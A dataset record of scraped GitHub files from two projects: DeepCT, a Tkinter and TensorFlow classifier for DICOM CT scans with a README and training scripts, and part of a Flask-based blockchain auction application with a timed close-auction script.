null
null
null
null
null
[ { "alpha_fraction": 0.6355921030044556, "alphanum_fraction": 0.6435486078262329, "avg_line_length": 33.35763168334961, "blob_id": "aaa1efb623372150a3fb155a599b4512a15106fd", "content_id": "f283da649f809cb246c5e8e8c192eb36aae56958", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15082, "license_type": "permissive", "max_line_length": 163, "num_lines": 439, "path": "/DeepCT.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Tkinter import\nfrom tkinter import *\nfrom tkinter import filedialog # Needed for Pyinstaller to work\n\n# TensorFlow import\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pydicom\nimport os\nimport PIL\n\n# Window\nmain = Tk()\nmain.title('DeepCT')\n\n# Variables for status of image and model\nis_image = False\nis_model = False\nglobal model_from_upload # Whether the model was uploaded or created\nmodel_from_upload = True\n\n# Check status of whether there are images\nglobal image_status_text\nimage_status_text = StringVar(main)\n\ndef check_image_status():\n\n if (is_image == False):\n image_status_text.set(\"Uploaded Image: False\")\n else:\n image_status_text.set(\"Uploaded Image: True\")\n\n# Check status of whether there is an uploaded model\nglobal model_status_text\nmodel_status_text = StringVar(main)\n\ndef check_model_status():\n\n if (is_model == False):\n model_status_text.set(\"Uploaded Model: False\")\n else:\n model_status_text.set(\"Uploaded Model: True\")\n\n# Upload DICOM image\ndef upload_image():\n\n # Upload the DICOM\n global import_image_filename\n import_image_filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"DICOM Image\",\"*.dcm\"),(\"all files\",\"*.*\")))\n\n # Set image uploaded to true\n global is_image\n is_image = True\n\n # Convert the dicom into .png\n try:\n ImageFile = pydicom.dcmread(import_image_filename)\n plt.imsave(str(import_image_filename + \".png\"), ImageFile.pixel_array, cmap=plt.cm.gray, vmin=1, vmax=2500)\n except FileNotFoundError:\n is_image = False # In case no file is uploaded\n\n # Update image status\n check_image_status()\n\n# Upload trained model\ndef upload_model():\n\n # Upload the model\n global import_model_filename\n import_model_filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"ML Model (.h5)\",\"*.h5\"),(\"all files\",\"*.*\")))\n\n # Set model to true\n global is_model\n is_model = True\n\n check_model_status()\n\n# Load and prepare the uploaded image\ndef load_image(filename):\n # Load the image\n img = load_img(filename, target_size=(150, 150))\n # Convert to array\n img = img_to_array(img)\n # Reshape into a single sample with 3 channels\n img = img.reshape(1, 150, 150, 3)\n # Center pixel data\n img = img.astype(\"float32\")\n return img\n\n# Load an image and predict its class\ndef run_program():\n # Load the image\n img = load_image(import_image_filename + \".png\")\n \n global model_filename\n\n # Load the model\n if(model_from_upload == False):\n model_filename = \"generated_model.h5\"\n else:\n model_filename = import_model_filename\n\n model = load_model(model_filename)\n\n # Predict the class\n result = model.predict(img)\n result_val = result[0]\n\n # Initialize result text variable\n global result_text\n # Print result based on numeric value\n if (result_val == 0):\n result_text = \"Cancer\"\n else:\n result_text = \"Healthy\"\n\n# Display the value in Entry box\ndef display_result():\n # Run the program while catching 1. No Image/Model uploaded 2. model uploaded not a .h5 file\n try:\n run_program()\n blank.delete(0, 'end')\n blank.insert(0, result_text)\n except NameError:\n messagebox.showerror(\"Error\", \"No Image/Model uploaded. Please try again.\")\n except OSError:\n messagebox.showerror(\"Error\", \"Model Not .h5. Please import another model or create one.\")\n\ndef open_healthy_train_dir():\n global healthy_train_dir_path\n healthy_train_dir_path = filedialog.askdirectory()\n print(healthy_train_dir_path)\n\ndef open_cancer_validate_dir():\n global cancer_validate_dir_path\n cancer_validate_dir_path = filedialog.askdirectory()\n print(cancer_validate_dir_path)\n\ndef open_healthy_validate_dir():\n global healthy_validate_dir_path\n healthy_validate_dir_path = filedialog.askdirectory()\n print(healthy_validate_dir_path)\n\n# Create a new window for training\ndef create_train_window():\n train_window = Toplevel(main)\n train_window.title(\"Train a Model\")\n\n # Variables for existence of directories\n cancer_train_dir_exist = False\n healthy_train_dir_exist = False\n cancer_validate_dir_exist = False\n healthy_validate_dir_exist = False\n\n # Cancer Training Directory\n global cancer_train_dir_text\n cancer_train_dir_text = StringVar(train_window)\n\n def check_cancer_train_dir_status():\n\n if(cancer_train_dir_exist == False):\n cancer_train_dir_text.set(\"Cancer Training Directory: False\")\n else:\n cancer_train_dir_text.set(\"Cancer Training Directory: True\")\n\n\n def open_cancer_train_dir():\n global cancer_train_dir_path\n cancer_train_dir_path = filedialog.askdirectory()\n\n nonlocal cancer_train_dir_exist\n cancer_train_dir_exist = True\n\n check_cancer_train_dir_status()\n\n check_cancer_train_dir_status()\n\n Label(train_window, textvariable = cancer_train_dir_text).grid(row=0)\n Button(train_window, text=\"Select\", command=open_cancer_train_dir).grid(row=0, column=1)\n\n # Healthy Training Directory\n global healthy_train_dir_text\n healthy_train_dir_text = StringVar(train_window)\n\n def check_healthy_train_dir_status():\n\n if(healthy_train_dir_exist == False):\n healthy_train_dir_text.set(\"Healthy Training Directory: False\")\n else:\n healthy_train_dir_text.set(\"Healthy Training Directory: True\")\n\n def open_healthy_train_dir():\n global healthy_train_dir_path\n healthy_train_dir_path = filedialog.askdirectory()\n\n nonlocal healthy_train_dir_exist\n healthy_train_dir_exist = True\n\n check_healthy_train_dir_status()\n\n check_healthy_train_dir_status()\n\n Label(train_window, textvariable = healthy_train_dir_text).grid(row=1)\n Button(train_window, text=\"Select\", command=open_healthy_train_dir).grid(row=1, column=1)\n\n # Cancer Validation Directory\n global cancer_validate_dir_text\n cancer_validate_dir_text = StringVar(train_window)\n\n def check_cancer_validate_dir_status():\n\n if(cancer_validate_dir_exist == False):\n cancer_validate_dir_text.set(\"Cancer Validation Directory: False\")\n else:\n cancer_validate_dir_text.set(\"Cancer Validation Directory: True\")\n\n def open_cancer_validate_dir():\n global cancer_validate_dir_path\n cancer_validate_dir_path = filedialog.askdirectory()\n\n nonlocal cancer_validate_dir_exist\n cancer_validate_dir_exist = True\n\n check_cancer_validate_dir_status()\n\n check_cancer_validate_dir_status()\n\n Label(train_window, textvariable = cancer_validate_dir_text).grid(row=2)\n Button(train_window, text=\"Select\", command=open_cancer_validate_dir).grid(row=2, column=1)\n\n # Healthy Validation Directory\n global healthy_validate_dir_text\n healthy_validate_dir_text = StringVar(train_window)\n\n def check_healthy_validate_dir_status():\n\n if(healthy_validate_dir_exist == False):\n healthy_validate_dir_text.set(\"Healthy Validation Directory: False\")\n else:\n healthy_validate_dir_text.set(\"Healthy Validation Directory: True\")\n\n def open_healthy_validate_dir():\n global healthy_validate_dir_path\n healthy_validate_dir_path = filedialog.askdirectory()\n\n nonlocal healthy_validate_dir_exist\n healthy_validate_dir_exist = True\n\n check_healthy_validate_dir_status()\n\n check_healthy_validate_dir_status()\n\n Label(train_window, textvariable = healthy_validate_dir_text).grid(row=3)\n Button(train_window, text=\"Select\", command=open_healthy_validate_dir).grid(row=3, column=1)\n\n # ML model variables\n global num_epochs\n target_size = 150\n\n Label(train_window, text=\"Number of Epochs:\").grid(row=4)\n num_epochs_entry = Entry(train_window)\n num_epochs_entry.grid(row=4, column=1) # So that .get() works and does not select .grid()\n\n def create_model():\n\n # Catches number of epochs being zero or a decimal\n try:\n num_epochs = int(num_epochs_entry.get())\n except ValueError:\n messagebox.showerror(\"Error\", \"Number of epochs cannot be zero and must be a whole number.\")\n\n # Catches number of epochs being less than one\n try: \n if (num_epochs < 1):\n messagebox.showerror(\"Error\", \"Number of epochs cannot be less than one.\")\n except UnboundLocalError:\n pass # So that there is no error when num_epochs has no value\n\n # More variables\n\n try:\n num_cancer_tr = len(os.listdir(cancer_train_dir_path))\n num_healthy_tr = len(os.listdir(healthy_train_dir_path))\n\n num_cancer_val = len(os.listdir(cancer_validate_dir_path))\n num_healthy_val = len(os.listdir(healthy_validate_dir_path))\n\n total_train = num_cancer_tr + num_healthy_tr\n total_val = num_cancer_val + num_healthy_val\n print(total_val)\n except NameError:\n messagebox.showerror(\"Error\", \"At least one of the selected directories is invalid.\") # If no directory is selected, or other error\n\n # Initializing the CNN\n classifier = Sequential()\n\n # Convolution\n classifier.add(Convolution2D(32, 3, 3, input_shape = (target_size, target_size, 3), activation = 'relu'))\n\n # Pooling\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n # Adding a second convolutional layer\n classifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\n classifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n # Flattening\n classifier.add(Flatten())\n\n # Full connection\n classifier.add(Dense(128, activation = 'relu'))\n classifier.add(Dense(1, activation = 'sigmoid'))\n\n # Compile the CNN\n classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n # Fit the CNN to the images\n train_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n test_datagen = ImageDataGenerator(rescale = 1./255)\n\n try:\n training_set = train_datagen.flow_from_directory(os.path.abspath(os.path.join(cancer_train_dir_path, os.pardir)), # Get training parent directory\n target_size = (target_size, target_size),\n batch_size = total_train // 1000,\n class_mode = 'binary')\n\n validation_set = test_datagen.flow_from_directory(os.path.abspath(os.path.join(cancer_validate_dir_path, os.pardir)), # Get validation parent directory\n target_size = (target_size, target_size),\n batch_size = total_val // 1000,\n class_mode = 'binary')\n \n history = classifier.fit_generator(training_set,\n steps_per_epoch = total_train // 500,\n epochs = num_epochs,\n validation_data = validation_set,\n validation_steps = total_val // 500)\n\n # Visualize training results\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs_range = range(num_epochs)\n\n plt.figure(figsize=(8, 8))\n plt.subplot(1, 2, 1)\n plt.plot(epochs_range, acc, label='Training Accuracy')\n plt.plot(epochs_range, val_acc, label='Validation Accuracy')\n plt.legend(loc='lower right')\n plt.title('Training and Validation Accuracy')\n\n plt.subplot(1, 2, 2)\n plt.plot(epochs_range, loss, label='Training Loss')\n plt.plot(epochs_range, val_loss, label='Validation Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Loss')\n plt.show(block=False)\n\n # Save the trained model\n classifier.save('generated_model.h5')\n print()\n print(\"Trained model saved.\")\n # Set model to true\n global is_model\n is_model = True\n # Check status of model exist\n check_model_status()\n # Declare that the program should use the generated model\n global model_from_upload\n model_from_upload = False\n\n except ZeroDivisionError: # In final build, remove FileNotFoundError to except all\n pass # In case directory is not found\n\n Button(train_window, text=\"Create Model\", command=create_model).grid(row=5)\n\n # Directions for directory setup\n Label(train_window, text=\"Individual directories should be one level below total train/validate directories.\").grid(row=0, column=2)\n\n# Menu\nmenubar = Menu(main)\n\n# create a pulldown menu, and add it to the menu bar\nfilemenu = Menu(menubar, tearoff=0)\nfilemenu.add_command(label=\"Select Image\", command=upload_image) # Uploads the image\nmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n# Training menu\ntrain_menu = Menu(menubar, tearoff=0)\ntrain_menu.add_command(label=\"Import Trained Model\", command=upload_model)\ntrain_menu.add_command(label=\"Train a Model\", command=create_train_window)\nmenubar.add_cascade(label=\"Train Model\", menu=train_menu)\n\n# Display the menu\nmain.config(menu=menubar)\n\n# Display image and model\ncheck_image_status() # Update status of image upload\ncheck_model_status() # Update status of model upload\n\nimage_label = Label(main, textvariable = image_status_text)\nmodel_label = Label(main, textvariable = model_status_text)\n\n# Display result\nblank = Entry(main)\n\n# Button to run the program\nrun_button = Button(main, text='Classify', command=display_result)\n\n# Positioning of elements in main window\nimage_label.grid(row=0)\nmodel_label.grid(row=1)\nrun_button.grid(row=2)\nblank.grid(row=2, column=1)\n\nmain.mainloop()\n\n# Delete the created .png image\nos.remove(import_image_filename + \".png\")" }, { "alpha_fraction": 0.7458351254463196, "alphanum_fraction": 0.7513883113861084, "avg_line_length": 21.7281551361084, "blob_id": "cd25ad518930b8ec8df15ccffb99f557120c5c15", "content_id": "9d4a58e931a85612a07fc6c09da40c78f8a58abb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2341, "license_type": "permissive", "max_line_length": 421, "num_lines": 103, "path": "/README.md", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# DeepCT\n\nUsing Python to classify DICOM computerized tomography images. Uses the TensorFlow framework.\nClick [here](https://donnellyinitiative.org) to view this project's website.\nTo install dependencies, make sure that [pip](https://pip.pypa.io/en/stable/installing/) is running on your system.\n\n# Table of Contents\n\n* [License](#license)\n* [Dependencies](#dependencies)\n\n<a name=\"license\"/>\n\n# License\n\nBy using this software, you agree to the terms and conditions outlined in the [License](https://github.com/aidanelm/donnellyinitiative/blob/master/LICENSE). This results generated by this software should not be taken as medical advice and should not be a substitute for seeing a medical professional. Furthermore, the outputs of this software should not be considered conclusive unless verified by a medical professional.\n\n\n<a name=\"dependencies\"/>\n\n# Dependencies\n\n## TensorFlow\n\nGoogle's open-source machine learning library. DeepCT uses the TensorFlow framework.\n\nFor the software to be converted to an executable file, some newer versions are not compatible. The latest version tested with DeepCT is version 1.10, which is incompatible with Python versions 3.7 and newer.\n\nNote: The GPU version of TensorFlow has not been used with this software.\n\n```\npip install tensorflow==1.10\n```\nTo check if TensorFlow is running on your system, run:\n\n```python\nimport tensorflow as tf\nprint(tf.__version__)\n```\nIf installed correctly, it should output version 1.10.\n\n## Matplotlib\n\nUsed to plot the data, visually display the data, and create .png images.\n\n```\npip install matplotlib\n```\n\n## PyDICOM\n\nUsed to convert the DICOM images into .png format.\n\n```\npip install pydicom\n```\n\n## SciPy\n\nA fundamental library for machine learning.\n\n```\npip install scipy\n```\n\n## NumPy\n\nThe foundation for Tensorflow and SciPy. Installed with TensorFlow and SciPy by default.\n\n```\npip install numpy\n```\n\nTo check if NumPy is running on your system, run:\n\n```python\nimport numpy as np\nprint(np.__version__)\n```\n\n## Pillow\n\nUsed to work with the created .png images (originally in .dcm format).\n\n```\npip install pillow\n```\n\n## H5py\n\nInstalled with TensorFlow by default. Used to save and load existing ML models.\n\n```\npip install h5py\n```\n\n## Pyinstaller\n\nUsed to convert the .py file(s) into an executable file (Windows).\n\n```\npip install pyinstaller\n```\n" }, { "alpha_fraction": 0.6494807004928589, "alphanum_fraction": 0.6632047295570374, "avg_line_length": 24.443395614624023, "blob_id": "3dca8e06c710acee18197cee6dd25c7b701a6812", "content_id": "748fa272a14d2c9f1f337fbb9775ed3f9cde97ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "permissive", "max_line_length": 102, "num_lines": 106, "path": "/test.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Tkinter import\nfrom tkinter import *\nfrom tkinter import filedialog # Needed for Pyinstaller to work\n\n# Helper libraries\nimport pydicom\nfrom scipy import ndimage\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport glob\nimport os\n\n# Window\nmain = Tk()\nmain.title('DeepCT')\n\n# Change the directory\ndef select_directory():\n path = filedialog.askdirectory()\n os.chdir(path)\n\n# Display the model\ndef show_scan():\n\n # load the DICOM files\n files = []\n\n for fname in glob.glob(\"*.dcm\", recursive=False):\n files.append(pydicom.dcmread(fname))\n\n # Skip files without a SliceLocation (Scout Views)\n slices = []\n for f in files:\n if hasattr(f, 'SliceLocation'):\n slices.append(f)\n else:\n continue\n\n # Order files correctly\n slices = sorted(slices, key=lambda s: s.SliceLocation)\n\n # pixel aspects, assuming all slices are the same\n ps = slices[0].PixelSpacing\n ss = slices[0].SliceThickness\n ax_aspect = ps[1]/ps[0]\n sag_aspect = ps[1]/ss\n cor_aspect = ss/ps[0]\n\n # create 3D array\n img_shape = list(slices[0].pixel_array.shape)\n img_shape.append(len(slices))\n img3d = np.zeros(img_shape)\n\n # fill 3D array with the images from the files\n for i, s in enumerate(slices):\n img2d = s.pixel_array\n img3d[:, :, i] = img2d\n\n # Plot axial slice\n axial = plt.subplot(2, 2, 1)\n axial.set_title(\"Axial\")\n plt.imshow(img3d[:, :, img_shape[2]//2])\n axial.set_aspect(ax_aspect)\n plt.set_cmap(\"bone\")\n \n # Plot sagittal slice\n sagittal = plt.subplot(2, 2, 2)\n sagittal.set_title(\"Sagittal\")\n\n # Rotate the image correctly (by 90 degrees)\n sag_original = img3d[:, img_shape[1]//2, :]\n sag_rotated = ndimage.rotate(sag_original, 90)\n plt.imshow(sag_rotated)\n sagittal.set_aspect(sag_aspect)\n plt.set_cmap(\"bone\")\n\n # Plot coronal slice\n coronal = plt.subplot(2, 2, 3)\n coronal.set_title(\"Coronal\")\n plt.imshow(img3d[img_shape[0]//2, :, :].T, origin=\"lower\") # Aligns the scan correctly\n coronal.set_aspect(cor_aspect)\n plt.set_cmap(\"bone\")\n\n # Ensure no overlap\n plt.tight_layout()\n\n plt.show()\n\n# Menu\nmenubar = Menu(main)\n\n# create a pulldown menu, and add it to the menu bar\nfilemenu = Menu(menubar, tearoff=0)\nfilemenu.add_command(label=\"Select Directory\", command=select_directory) # Selects the DICOM directory\nmenubar.add_cascade(label=\"File\", menu=filemenu)\n\n# Model menu\nmodel_menu = Menu(menubar, tearoff=0)\nmodel_menu.add_command(label=\"Display the Scan\", command=show_scan)\nmenubar.add_cascade(label=\"Train Model\", menu=model_menu)\n\n# Display the menu\nmain.config(menu=menubar)\n\nmain.mainloop()" }, { "alpha_fraction": 0.6317718029022217, "alphanum_fraction": 0.6506150364875793, "avg_line_length": 32.81415939331055, "blob_id": "46a651a02af977c25b0028455f6a1b4e4e515909", "content_id": "a77ffa8040cd4fcf136f075036085a92bddbe672", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3821, "license_type": "permissive", "max_line_length": 107, "num_lines": 113, "path": "/train.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Keras imports\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Other imports\nimport matplotlib.pyplot as plt\nimport os\n\n# Locations of datasets\ncwd = os.getcwd()\nPATH = cwd+'\\dataset'\n\ntrain_dir = os.path.join(PATH, 'train')\nvalidation_dir = os.path.join(PATH, 'validation')\n\ntrain_cancer_dir = os.path.join(train_dir, 'cancer_png')\ntrain_healthy_dir = os.path.join(train_dir, 'healthy_png')\nvalidation_cancer_dir = os.path.join(validation_dir, 'cancer_png')\nvalidation_healthy_dir = os.path.join(validation_dir, 'healthy_png')\n\n# Variables\nnum_epochs = 2\ntarget_size = 150\n\nnum_cancer_tr = len(os.listdir(train_cancer_dir))\nnum_healthy_tr = len(os.listdir(train_healthy_dir))\n\nnum_cancer_val = len(os.listdir(validation_cancer_dir))\nnum_healthy_val = len(os.listdir(validation_healthy_dir))\n\ntotal_train = num_cancer_tr + num_healthy_tr\ntotal_val = num_cancer_val + num_healthy_val\n\n# Initialising the CNN\nclassifier = Sequential()\n\n# Convolution\nclassifier.add(Convolution2D(32, 3, 3, input_shape = (target_size, target_size, 3), activation = 'relu'))\n\n# Pooling\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Adding a second convolutional layer\nclassifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Flattening\nclassifier.add(Flatten())\n\n# Full connection\nclassifier.add(Dense(128, activation = 'relu'))\nclassifier.add(Dense(1, activation = 'sigmoid'))\n\n# Compile the CNN\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Fit the CNN to the images\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntraining_set = train_datagen.flow_from_directory(train_dir,\n target_size = (target_size, target_size),\n batch_size = total_train // 1000,\n class_mode = 'binary')\n\nvalidation_set = test_datagen.flow_from_directory(validation_dir,\n target_size = (target_size, target_size),\n batch_size = total_val // 1000, # Change to 1000 in final build\n class_mode = 'binary')\n\nhistory = classifier.fit_generator(training_set,\n steps_per_epoch = total_train // 500, # Change to 500 in final build\n epochs = num_epochs,\n validation_data = validation_set,\n validation_steps = total_val // 500) # Change to 500 in final build\n\n# Visualize training results\nacc = history.history['acc']\nval_acc = history.history['val_acc']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(num_epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n# Save the trained model\nclassifier.save('test_model.h5')\nprint()\nprint(\"Trained model saved.\")\n" }, { "alpha_fraction": 0.719836413860321, "alphanum_fraction": 0.7280163764953613, "avg_line_length": 34, "blob_id": "812af7cf6766f3bc5ece1df8a086f54968b54625", "content_id": "b312fb3f8441e068434621933e511c87f4d70644", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "permissive", "max_line_length": 132, "num_lines": 14, "path": "/DICOM_to_png.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "import pydicom\nimport matplotlib.pyplot as plt\nimport os\n\ndirectory_in_str = \"dataset/validation/cancer\"\n\ndirectory = os.fsencode(directory_in_str)\n\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n filename_plus_dir = directory_in_str + \"/\" + filename\n print(filename_plus_dir)\n ImageFile = pydicom.read_file(filename_plus_dir)\n plt.imsave(str(\"dataset/validation/cancer_png/\" + filename + \".png\"), ImageFile.pixel_array, cmap=plt.cm.gray, vmin=1, vmax=250)" } ]
5
tranvien98/blockchain
https://github.com/tranvien98/blockchain
177c42d14e98d16adda31e224f64c8b23b1ba27c
975be87444a889b3cdc60e5323c8db3619e39320
cc7946a54631505c507fbc1ae7ea1902a639c552
refs/heads/master
2020-05-21T21:26:30.866431
2019-05-23T04:14:08
2019-05-23T04:14:08
186,154,098
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.536697268486023, "alphanum_fraction": 0.5405198931694031, "avg_line_length": 27.434782028198242, "blob_id": "bb231d884e6a4e88dc8902021fc7678009737917", "content_id": "45b9d682625deee45374740295ea749b982f199e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 76, "num_lines": 46, "path": "/app/smart.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import threading\nimport time\nfrom threading import Timer\nimport sys\nimport requests\n\n\ndef run(times, author, id_auctioneer, CONNECTED_NODE_ADDRESS):\n def close_auction(author, id_auctioneer, CONNECTED_NODE_ADDRESS):\n\n post_object = {\n 'type': 'close',\n 'content': {\n 'id_auctioneer': id_auctioneer,\n 'author': author,\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n print(author, id_auctioneer, CONNECTED_NODE_ADDRESS)\n\n def mine():\n # dao block moi de luu tru thong tin\n url = '{}/mine'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n\n data = response.json()['response']\n print(data)\n\n start = time.perf_counter()\n while True:\n if times() and time.perf_counter()-start > 60:\n t = Timer(0, close_auction, args=[\n author, id_auctioneer, CONNECTED_NODE_ADDRESS])\n t.start()\n f = Timer(0.6, mine)\n f.start()\n break\n if not times():\n break\n" }, { "alpha_fraction": 0.5568587183952332, "alphanum_fraction": 0.565017819404602, "avg_line_length": 25.863014221191406, "blob_id": "9a42458ab7ad00044b0823dcf6d76a8d56ce4994", "content_id": "74131f1fb07ca20dc4e99a2a14d0fcc0302bacc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5912, "license_type": "no_license", "max_line_length": 81, "num_lines": 219, "path": "/app/views.py", "repo_name": "tranvien98/blockchain", "src_encoding": "UTF-8", "text": "import datetime\nimport json\nimport os\nimport requests\nfrom flask import Flask\nfrom flask import render_template, redirect, request, jsonify\nimport time\nimport string\nimport codecs\n__location__ = os.path.realpath(os.path.join(\n os.getcwd(), os.path.dirname(__file__)))\n\napp = Flask(__name__)\n\n\n# The node with which our application interacts, there can be multiple\n# such nodes as well.\n\n\nposts = []\n\n\ndef fetch_posts():\n \"\"\"\n lấy chuỗi từ peer và phân tích dữ liệu\n \"\"\"\n get_chain_address = \"{}/open_auctions\".format(CONNECTED_NODE_ADDRESS)\n \n response = requests.get(get_chain_address)\n print(response)\n if response.status_code == 200:\n content = []\n data = json.loads(response.content)\n auctions = data['auctions']\n print(data)\n\n global posts\n posts = sorted(auctions, key=lambda k: k['timestamp'],\n reverse=True)\n \n\n\[email protected]('/')\ndef index():\n fetch_posts()\n return render_template('index.html',\n title='Auction system based on blockchain technology',\n posts=posts,\n node_address=CONNECTED_NODE_ADDRESS,\n readable_time=timestamp_to_string)\n\n\[email protected]('/mine', methods=['GET', 'POST'])\ndef mine():\n# dao block moi de luu tru thong tin\n url = '{}/mine'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n\n data = response.json()['response']\n print(data)\n return data\n\[email protected]('/submit', methods=['POST'])\ndef submit_textarea():\n \"\"\"\n tạo giao dịch mới khi ấn post\n \"\"\"\n id_auctioneer = int(request.form['id_auctioneer'])\n item = request.form['item']\n auctioneer = request.form['auctioneer']\n author = request.remote_addr\n starting_price = float(request.form['starting_price'])\n post_object = {\n 'type': 'open',\n 'content': {\n 'id_auctioneer': id_auctioneer,\n 'item': item,\n 'auctioneer': auctioneer,\n 'author': author + ':5000',\n 'price_bidder': starting_price,\n 'status': 'opening',\n 'timestamp': time.time(),\n 'contract': 'run',\n 'connect': CONNECTED_NODE_ADDRESS\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\n\n\[email protected]('/close_auction', methods=['GET', 'POST'])\ndef close_auction():\n \"\"\"\n đóng cuộc đấu giá\n \"\"\"\n\n author = request.remote_addr\n id_auctioneer = int(request.args.get('id_auctioneer'))\n\n post_object = {\n 'type': 'close',\n 'content': {\n 'id_auctioneer' : id_auctioneer,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\n\n\[email protected]('/auctioning', methods=['GET', 'POST'])\ndef auctioning():\n \"\"\"\n tao giao dich khi nguoi dau gia an nut send \n \"\"\"\n\n author = request.remote_addr\n id_auctioneer = int(request.form['id_auctioneer'])\n price_bidder = float(request.form['price_bidder'])\n\n post_object = {\n 'type': 'auctioning',\n 'content': {\n 'id_auctioneer' : id_auctioneer,\n 'id_bidder': author + ':5000',\n 'price_bidder' : price_bidder,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n contract_object = {\n 'type': 'execute',\n 'content': {\n 'contract': 'run',\n 'author': author+ ':5000',\n 'id_auctioneer': id_auctioneer,\n 'connect': CONNECTED_NODE_ADDRESS\n }\n }\n\n requests.post(new_tx_address,\n json=contract_object,\n headers={'Content-type': 'application/json'})\n return redirect('/')\n\[email protected]('/pending_tx', methods=['GET', 'POST'])\ndef get_pending_tx():\n\n url = '{}/pending_tx'.format(CONNECTED_NODE_ADDRESS)\n response = requests.get(url)\n data = response.json()\n return jsonify(data)\n\n\[email protected]('/update_chaincode', methods=['GET', 'POST'])\ndef update_chaincode():\n file = os.path.join(__location__, 'smart.py')\n code = ''\n\n with codecs.open(file, encoding='utf8', mode='r') as inp:\n code = inp.read()\n\n author = request.remote_addr\n\n post_object = {\n 'type': 'smartcontract',\n 'content': {\n 'code': code,\n 'author': author + ':5000',\n 'timestamp': time.time()\n }\n }\n\n new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n\n requests.post(new_tx_address,\n json=post_object,\n headers={'Content-type': 'application/json'})\n\n return redirect('/')\ndef timestamp_to_string(epoch_time):\n return datetime.datetime.fromtimestamp(epoch_time).strftime('%H:%M')\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument('-p', '--port', default=8080,\n type=int, help='port to listen on')\n parser.add_argument('--host', 